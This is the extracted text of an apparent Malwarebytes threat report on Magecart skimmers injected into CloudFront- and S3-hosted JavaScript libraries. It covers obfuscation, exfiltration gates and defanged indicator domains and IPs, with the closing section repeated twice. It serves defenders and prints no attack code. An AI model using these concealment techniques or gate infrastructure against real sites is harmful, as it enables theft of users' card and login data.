the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 342 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. 
Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 343 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. 
Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 344 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 345 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. 
A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. 
The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 346 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 347 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 348 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. 
Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 349 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. 
Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 350 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nSource: https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 351 of 351",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/"
	],
	"report_names": [
		"magecart-skimmers-found-on-amazon-cloudfront-cdn"
	],
	"threat_actors": [
		{
			"id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed",
			"created_at": "2023-01-06T13:46:38.814104Z",
			"updated_at": "2026-04-10T02:00:03.110104Z",
			"deleted_at": null,
			"main_name": "MageCart",
			"aliases": [],
			"source_name": "MISPGALAXY:MageCart",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434493,
	"ts_updated_at": 1775791451,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a2b58817a1bb63945895f6b4d0a0afcc98e53b8b.pdf",
		"text": "https://archive.orkl.eu/a2b58817a1bb63945895f6b4d0a0afcc98e53b8b.txt",
		"img": "https://archive.orkl.eu/a2b58817a1bb63945895f6b4d0a0afcc98e53b8b.jpg"
	}
}